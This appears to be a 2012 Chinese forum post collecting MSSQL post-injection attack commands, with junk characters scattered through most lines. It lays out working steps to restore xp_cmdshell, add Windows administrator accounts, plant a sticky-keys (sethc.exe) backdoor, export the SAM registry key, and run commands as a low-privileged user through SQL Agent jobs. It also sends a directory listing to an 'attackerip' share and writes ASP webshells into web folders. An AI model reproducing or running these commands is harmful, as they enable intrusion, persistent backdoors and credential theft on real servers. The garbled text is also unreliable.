1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
) B) A" Z$ w1 \4 F6 b+ q! z恢复方法:查询分离器连接后,% g+ r- E' x2 e* F, M4 A; _4 O7 w
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
2 W+ a6 u! D6 z3 w/ y3 f第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 0 n" {4 P' v* J2 h4 R* l7 B
然后按F5键命令执行完毕
, _" b) n# O5 b% U) j7 q" P" {6 R+ Q; O# F' k
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)0 ]6 M" B. J# ]2 f8 O: D
恢复方法:查询分离器连接后,' q7 _0 N6 Q" W5 V& R' b
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"9 w6 {7 q8 J. ^4 q/ S# e
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ M( z8 i- N0 A2 ]! ~" j然后按F5键命令执行完毕& o# h7 m9 ~$ x& I, w9 c: i7 }- v$ W7 q
! Z- T7 l0 I7 }3 p d/ t( U3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)$ G: A7 X* w. a3 k& O/ c
恢复方法:查询分离器连接后,
! T3 h# i- g7 b7 e2 D9 @/ |+ O第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
: e. |# b$ Z7 g9 Q# ]第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
/ g: o, u7 w1 f( ]- V然后按F5键命令执行完毕- K7 z1 u$ o4 y
/ w) B# A; h4 h3 p! ^4 终极方法.1 G+ X; U f9 ~, o) a- J, ^5 ^
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
9 g \5 q. n4 l7 v. g; j查询分离器连接后,7 u5 e2 n% _: P, }; S( p0 H# M+ y
2000servser系统:
: t0 \3 u2 Y) |( ^; mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
2 |/ Q0 I; }) c- W- r$ W+ ^; B# Q9 U, T2 z! A" o1 H3 K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
& }8 N1 V5 C# B9 M6 ^! Q2 \4 K9 ?; I
" _+ `) K3 k8 N1 p' ^! qxp或2003server系统:
7 C) @ j$ u% l8 Q5 w" c; e( i9 F! O$ F5 U% g' H( ` l+ s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
4 n' h- \6 n1 T' E# ^6 Y5 b" ]
/ j6 F$ a& `' }" `- y" ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'. X* [8 D4 P" `0 Y; i
$ [" `: J6 S3 n! U
: z& @ t- @9 \$ L: _; v% m& q五个SHIFT
1 C* w$ q5 |7 M2 t% Y; f3 [declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
& @- K% d3 \/ E% i% s
; a+ ^! z2 ^8 j" I+ q) i/ bdeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; - y8 A9 Z0 }. Q' ?9 C
$ `# R; g) k) _
xp_cmdshell执行命令另一种方法8 O7 R- C! s' n$ N; a" ?
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
* i' J. g; X# R% u" u+ k9 Z) m& G1 d/ `. L0 V% O1 Z. [4 b
判断存储扩展是否存在7 ~- }4 G& W0 ?% X6 l/ u
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
6 y: \: C! l/ d: P7 c返回结果为1就OK& \, E. d& K8 a2 s" k$ b2 W
' A" A- l1 @) G4 ?, Y/ I
9 n9 r) G- ?2 y4 ?( R
上传xplog70.dll恢复xp_cmdshell语句:
+ J X1 J8 B3 I. y- [3 c+ ], Zsp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
. O G! Y& t. o$ A; j/ [' C6 t8 V- U! I, Z
否则上传xplog7.0.dll1 H7 H7 E2 [ I9 {# c+ R
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'0 T/ g. \, q6 l: i8 K1 S5 u
A; D3 z7 R9 H: z5 ~* H* @
; w" Q/ L3 |! X& J
: `0 D3 j2 d7 H# [ X* `1 ^% x首先开启沙盘模式:$ ~, s9 A8 V. F/ h4 D* @
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# m k( E2 O* S/ }& {7 o
$ k* C% S( p# S+ L* W3 l" L$ b1 H然后利用jet.oledb执行系统命令
+ b6 K3 e- p5 p7 {* r, g" Vselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
$ D" _; o; D( i! C' ?9 j返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了- f' {+ m2 q$ p6 [
$ f7 ]7 r [9 a m: `0 z
3 N: B+ \0 C- v+ }1 M: u0 S9 b
7 p4 P$ O" ~' k
恢复过程sp_addextendedproc 如下:
1 w+ u9 w. F) r; K. ~create procedure sp_addextendedproc --- 1996/08/30 20:13
. e3 p/ D7 D+ ^! d@functname nvarchar(517),/* (owner.)name of function to call */
* d& A- o x6 A2 J3 y& E. z@dllname varchar(255)/* name of DLL containing function */
# Z) [0 m4 N9 z# d/ J( W! sas
0 N4 |( V& m g) Aset implicit_transactions off
; z1 h+ P# ]" D! R) ?9 hif @@trancount > 0 - ?8 U' E9 E6 Q0 ]& Y# r3 ^
begin
* z& K7 M& @) O7 \7 Z- praiserror(15002,-1,-1,'sp_addextendedproc')
# ~- v* n' F6 i! R6 i' A; preturn (1) 8 ?. u- X% \3 N- ~& t) r
end
; T" {* j+ |6 U! T% c+ \dbcc addextendedproc( @functname, @dllname) 7 |5 X# C5 f8 V, O
return (0) -- sp_addextendedproc
7 {; ^ M# [* ?/ dGO
( ]8 d8 ~+ C' V4 a+ @
W8 @' L$ N/ j p' L! t5 b$ T( F0 e* H5 z
% H; x% O) m' l
导出管理员密码文件
" ~! g1 u( Q" D9 ^& b7 k/ _" `! Xsa默认可以读sam键.应该。
) f7 z1 u1 ~8 W4 Hreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
D. k$ g' w# U+ }8 Z5 L- jnet user administrator test
& k! O4 u$ m7 I% q2 `. Y% \6 T- U用administrator登陆.2 A" p% w; k( _4 |
用完机器后
4 i! }% M5 Z4 E( T, E2 f4 K1 m3 yreg import c:\test.reg
6 C; w$ B# \; x# y根本不用克隆.+ b3 C; z6 W+ h8 `2 r
找到对应的sid.
7 x2 H( X2 r1 W3 N
% F- d2 s9 B( w/ y s% r: r+ D! R
5 w2 p/ {8 G" H6 W( \
恢复所有存储过程8 k2 t: w3 [- u+ z0 h/ C R) d* H
use master " e1 _ K q( U- W
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
' m3 W3 ^9 Z2 `* _exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
F7 V) v2 O2 o- {9 D; p+ o* w! @exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
) l% p) y, m$ W: }8 U* l$ qexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
$ t" O: C- L" |exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
V. |& `% c* w: A2 E0 R7 pexec sp_addextendedproc sp_OACreate,'odsole70.dll'
: h' F$ A' P% Q: P) ~" Dexec sp_addextendedproc sp_OADestroy,'odsole70.dll' % g8 L6 M$ u) W" ?5 d
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
8 h" [- r* z0 R9 {/ dexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
2 T% h4 \, s) @$ c% Sexec sp_addextendedproc sp_OAMethod,'odsole70.dll' e: d- x+ V1 i4 |" p' K9 o1 y
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' - e8 ^. F7 M+ K+ C7 s" a
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
/ o$ P8 H/ W+ {exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
$ S# d+ _" y1 v) ?/ P) w' _7 f7 nexec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 7 y' Q" C$ ^3 V3 r2 d3 {8 R3 |
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
: B: @, Z6 ?. ^& @/ K( `exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' 8 M7 r+ c8 G- B
exec sp_addextendedproc xp_regread,'xpstar.dll' k X( t: ~1 \
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
. {* l" c9 J; B8 Mexec sp_addextendedproc xp_regwrite,'xpstar.dll' ) R7 c! Y2 h6 O( n" r, D) c
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
" w# r. V- s; @3 _$ F. q
; o7 M1 p# h" z. g0 K# R3 ^0 {. K# _/ Y% l, g
建立读文件的存储过程" \& W3 d2 Z4 N$ V
Create proc sp_readTextFile @filename sysname) X; J( W3 z" v' C( F/ _. p
as
6 y9 W/ P( t9 _7 X" {
7 ?# D) ^7 k) B5 A# i+ e begin q9 }4 `+ z$ u! O: @( g, T
set nocount on " F1 q% ~7 b0 F& J
Create table #tempfile (line varchar(8000)): ~ ~ V% Y# X$ a, O& y0 P2 n
exec ('bulk insert #tempfile from "' + @filename + '"')+ k' \2 y9 q. H; _+ }' Q* r
select * from #tempfile: P" q) r. }7 y+ v& o/ j
drop table #tempfile+ ]# L) x% t$ F# E- T+ a
End+ w- s9 B( c9 q- `
4 ] \) t) c- P8 q
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件2 P; F3 h- ?5 U
查看登录用户
$ V4 Y& o4 u+ I/ n3 RSelect * from sysxlogins/ U) ~2 e+ v; u. s. W
! \: t# ?* T0 z2 O+ n, n" D把文件内容读取到表中
0 E+ T8 z: A n2 Z! m' L0 \BULK INSERT tmp from "c:\test.txt"
; Z; F! ^2 s3 j2 c2 JdElete from 表名 清理表里的内容
2 }% P7 T( i$ L4 t& ^( j( W& x- U1 H/ icreate table b_test(fn nvarchar(4000));建一个表,字段为fn
( K2 H' n8 s# \, o
; ?. T, P5 H" Z, d: X9 x2 V8 U5 ~* o
q" k6 |( L( B8 T加sa用户
( D% Q7 e& w1 w) P, O1 qexec master.dbo.sp_addlogin user,pass;; L+ ~$ O$ f* }4 V( }
exec master.dbo.sp_addsrvrolemember user,sysadmin5 C& p# e8 t0 z; V- o
7 s" `8 x$ g5 `' C5 t( y- F
# }! o; Q9 l: }+ [; T* G& C, a$ k' o# s
读文件代码) G3 J4 t# h7 W+ L: `' A i
declare @o int, @f int, @t int, @ret int
! Q5 p, I1 p8 Q* a9 i, z$ Sdeclare @line varchar(8000)
+ U8 |5 J# y! Lexec sp_oacreate 'scripting.filesystemobject', @o out
" v, ?1 D& C; kexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 15 ]- U; O/ x8 d+ [% v: O0 O
exec @ret = sp_oamethod @f, 'readline', @line out$ P- D8 y7 S$ o" H( M& Z
while( @ret = 0 )9 @- g% C1 Q* [7 d' ]
begin: G: r! K. W) \: X
print @line& }, ^2 C. b, @- x
exec @ret = sp_oamethod @f, 'readline', @line out6 K& @; }, t& ~1 w
end
2 j; x: Z$ L# u% `& K* P G O1 q/ ?
" A, w/ p7 d$ Q a7 @4 \) B
写文件代码:
3 c1 e' ]; @/ ~declare @o int, @f int, @t int, @ret int
* u8 [7 _' a5 {0 w: u7 A! L7 ^exec sp_oacreate 'scripting.filesystemobject', @o out
+ u' R5 R) U% y. b( H& A/ @exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1" S! K( [: I* D1 J
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》+ c7 e S+ f$ z6 k8 A
; E5 M; B% c. p, W# W
9 {6 `! j" \0 |添加lake2 shell
7 R' p7 j- r; A7 R4 psp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'; h2 B* e) E k% u0 f' v
sp_dropextendedproc xp_lake2
* H) M" h8 S# f) u1 DEXEC xp_lake2 'net user'8 k& ~& j0 s) L& N" }* d+ c
& T* z, s F# [9 H- |8 y( ?( n; S6 T2 H2 e$ G4 s& e4 M
得到硬盘文件信息 ( U' j7 X/ u3 Z4 q6 _& F4 G8 b
--参数说明:目录名,目录深度,是否显示文件 * O o! e5 b! H) ~# {2 c
execute master..xp_dirtree 'c:'
8 l0 k* \. I6 B0 vexecute master..xp_dirtree 'c:',1
: _" y* x- o1 ^1 e/ W" ?) C* Nexecute master..xp_dirtree 'c:',1,1
: t$ y. Z6 y" p, T1 z2 U/ s% {' ?2 {
6 Q# z+ k! W# ~4 C9 c8 b6 a读serv-u配置信息
; \" f7 ?, w6 texec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
, w# H7 B% Q& O! \ j0 }exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
# Y" k5 E {) ?
& S2 u" A9 I8 I) [; a7 @/ Q7 s7 E通过xp_regwrite写SHIFT后门
; s# g' \* G* `/ k% sexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
7 ?# b0 [0 C- ]& ?! c) V% d7 h `( ?6 H0 f- J5 `! E4 H
3 p5 J3 \- ?7 v
7 r5 i0 g/ S8 g' B0 a; k找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';+ z) m6 K4 z( l1 i
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了+ D) Y2 K2 R# p: s# f V! V
0 q5 |2 P$ l* J
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'5 s, T; G @4 G+ \# G& q1 z+ J" B w
4 Y; p# ~' {9 L8 v
+ b6 q3 R8 M. I1 E
: N! e& ^* j, [2 f% O- x/ T+ B! W
sql server 2005下开启xp_cmdshell的办法
0 L8 j) W' A0 N! Z( a" ]6 |
& w" o* C. P6 z, h% uEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
4 b$ R ]4 G; q1 {6 R% P0 m5 \
SQL2005开启'OPENROWSET'支持的方法:; H( M* Y5 N8 e) x6 s" R
1 Z2 r* H2 \- }exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
0 B7 _1 A$ u; [3 Q+ v1 p7 {0 R# ?& w' ]) C8 B
SQL2005开启'sp_oacreate'支持的方法:
! [2 w I# J2 H* V. ^9 F; B+ s2 |& L* j! B" O' h# n# o3 B
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
, J# y/ @0 R- m5 ~0 b1 ^3 K& [( C5 r. |
2 H& n+ y) m; P7 T# [5 q; Q
& x& @) o3 h5 o- }1 q$ O7 o5 t7 }( F s' }2 e9 J
% X, |6 x. t Q$ D& c+ B' m
" D J1 M4 z) q T N4 j& |& N" _/ w. U1 N
4 L7 m# q4 e0 s2 H9 \+ F* [- K
( k! G2 a# q' P6 ~) }8 v& }! _& c# h8 ^8 @
2 d# u# c' U% S& V
0 _# y7 v7 ~* ^# ^
. C* l$ a" A9 Y: ~9 D' ^
5 {# ?# c5 a! F/ n# C/ {4 w5 q( b4 _- ~, j
O$ v/ e7 a# ]* r6 T p1 _
# m8 l5 s" Y- ^. z$ D& W1 B
% b" T/ P+ X" ^4 p; ?
: ]* ?6 s) y6 z4 _8 G/ O
, { E, y8 a+ w5 t; O. r/ o$ n/ r \) X# E' F5 V. F1 R
: ]# a; I, y1 c4 b5 m0 V, m
( f( j& `5 D, x& M
7 k, o. n: t( N) |& s7 C以下方面不知道能不能成功暂且留下研究哈:
* ]) N$ r, u w/ E$ Z4)
9 w. [2 g- e0 d& F, y+ Fuse msdb; --这儿不要是master哟
8 [% [& P7 Q! F3 B; l9 oexec sp_add_job @job_name= czy82 ;
( o& r3 b6 Z( x D0 }+ Eexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ; J0 I7 u0 J7 g8 s8 s7 o
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;) @( d- k* a0 \% N/ s
exec sp_start_job @job_name= czy82 ;& c9 l' \7 s% h, a; s% i
. n8 q& k; v+ H1 X) n- G% G利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以( t' _2 {" W# H7 A: {
执行tsql语句了.2 S# j; a. m5 x
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名' m' Z, T. V2 M1 q& ]2 p: k
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)! A+ H3 w0 C- \ D2 e ?/ ~
net start SQLSERVERAGENT% a, j) Q9 @7 a" V. \- i7 W
. Z/ l; x: R P m ^对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的6 n' T* ^6 R5 }4 z
USE msdb
' x9 q4 M% e9 h# I- y8 p8 HEXEC sp_add_job @job_name = GetSystemOnSQL ,
# G% @( B. t7 y* C* o( a! X@enabled = 1,
7 W, V5 l; y8 ?3 H0 e@description = This will give a low privileged user access to* s2 n7 D/ |' c6 c
xp_cmdshell ,
7 T$ T8 |# g5 N# \! L6 R@delete_level = 1
& F0 e' I X. l+ CEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,5 j8 l2 u3 O9 H) y8 f& ]" H6 g9 ?
@step_name = Exec my sql ,
5 y( d d- F1 U@subsystem = TSQL ,
# K0 E5 N. J* G1 @: e1 v@command = exec master..xp_execresultset N select exec8 G I: N+ C @9 a
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
Z) u* ?8 ^# b. j0 xEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
9 \& m+ b: J# v6 K# F) C@server_name = 你的SQL的服务器名 " S% b: g7 F2 F9 {1 ~) w( X
EXEC sp_start_job @job_name = GetSystemOnSQL
' b) C; ^6 p3 I" }$ N
( ]. b( Q! G& T1 \+ K& `% G7 `不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以% e7 f7 |2 q" K- w
才让我们可以以public执行xp_cmdshell
6 @2 ~, N7 P- ?. t. M7 w% P- X$ i2 r* y% E- w/ g) ^
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
4 e( s9 { U3 Q3 R- ?/ k, C在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
+ F! g% ?5 H1 s; _; L5 N2 h, K# N: G7 p1 f% c$ a" w2 q
USE msdb
8 Y* q; c" c+ {# z, ^EXEC sp_add_job @job_name = ArbitraryFilecreate ,
0 K/ i( m) }' o: B@enabled = 1,
; ^& p; r! B5 h3 Y+ B. @$ M& [- L@description = This will create a file called c:\sqlafc123.txt ,& U6 |$ i+ W# z5 I @, `
@delete_level = 1
# R2 ^% }( D6 f% M& }/ w4 M8 AEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
2 j9 @3 z& h- d@step_name = SQLAFC ,
& M$ S3 T" c' P6 R* B9 e* v% N@subsystem = TSQL ,
; b0 H N- B6 R$ Y [( u7 H@command = select hello, this file was created by the SQL Agent. ,
+ g8 a* m( E; G5 J" s: l@output_file_name = c:\sqlafc123.txt
f6 j5 L* j+ `- K% j: U$ l0 q3 QEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,. g& d+ j1 j' F1 p2 h- @# f
@server_name = SERVER_NAME , M4 E/ z1 C; F9 N/ q$ d
EXEC sp_start_job @job_name = ArbitraryFilecreate
7 I0 V! k) A! }8 i. b* s6 u h; y
' L. T5 ]: x2 ]9 A* Y0 x如果subsystem选的是:tsql,在生成的文件的头部有如下内容, b5 a+ V, U8 b$ Z
" ?, v/ y" T; T+ M% s* a
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19: j9 b+ |- {1 _9 W2 }! O- I
----------------------------------------------$ F6 R. c: ?+ x0 { }3 s$ U5 F
hello, this file was created by the SQL Agent.
( o0 Q( h# d @8 c5 {* z
9 c; Y( d9 T; v/ v(1 ?????)
( y: U$ S! v1 {+ y' j- J) L L
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
" T L1 J' c a. a命令的vbs文件到启动目录!: j* j0 E; L7 G/ d
B) f8 p1 {: i; U2 P0 D5 X8 g
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
, q& Z# Y( [/ _1 V4 e4 M8 T关于sp_MScopyscriptfile 看下面的例子2 U; b% I1 J" }; y" t; b
declare @command varchar(100)
Z! A s) a% @+ Pdeclare @scripfile varchar(200)
4 d2 W/ X% }" s) Q; |set concat_null_yields_null off
/ _( Z6 }) e+ L/ {- b, mselect @command= dir c:\ > "\\attackerip\share\dir.txt"
* i4 G# H( ?2 d! W! K; X7 Vselect @scripfile= c:\autoexec.bat > nul" | @command | rd "
2 v$ j. Y4 z. i; H+ `8 V% Dexec sp_MScopyscriptfile @scripfile , : I* ]1 Z/ t7 M' {" G, K
2 N. I! Q: r ~8 }! y9 m
这两个东东都还在测试试哟' F! V' m3 H& [
让MSSQL的public用户得到一个本机的web shell
" H2 c( s; l/ b; {% r: i( Z: T: W& S+ V! \
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
" c! `; X+ H3 A1 E--@query= select <img src=vbscript:msgbox(now())>
1 f0 W, k3 B2 h3 ?# U--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> . [& a0 o6 G$ D2 g; e' ^5 V- s
@query= select
- R! n. N- S" t<%On Error Resume Next
* b G7 A9 `$ G3 u" |Set oscript = Server.createObject("wscript.SHELL") ; F# Z) _. m4 D S
Set oscriptNet = Server.createObject("wscript.NETWORK")
8 l/ C2 [$ p% [6 e5 _Set oFileSys = Server.createObject("scripting.FileSystemObject")
' [& N* K9 l$ w7 G1 r- }szCMD = Request.Form(".CMD") : t9 }. ?9 G. K
If (szCMD <>"")Then
* r+ h( O+ ?* M/ ?+ H& ~) U# L5 m- v2 NszTempFile = "C:\" & oFileSys.GetTempName()
8 O) F7 b, Z- O: x( TCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) / N* I! j9 n- w# a& q5 _
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) 7 P3 Q T! D. B% }3 {: a- h
End If %> , \. M1 V8 O: ]' V" x
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
9 {. Y5 J0 s$ s) w1 z<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> , e% l4 Y. q D) j
</FORM><RE>
8 v! e# w4 o e<% If (IsObject(oFile))Then $ p. n* S3 g8 ?2 R$ J
On Error Resume Next
& S0 G9 [' \. M2 x2 S9 h; S- FResponse.Write Server.HTMLEncode(oFile.ReadAll)
, \! ^4 T$ ?6 zoFile.Close 6 v4 J) n# H/ K$ n7 g# F2 v. e
Call oFileSys.deleteFile(szTempFile, True) o& V0 J& J5 A7 d6 F0 ]2 J' ^) F
End If%> / q* \) b; m Z9 V
</BODY></HTML>
+ h, S) e4 F# o$ y0 X( b |
发表于 2012-9-15 14:37:30
收藏
支持
反对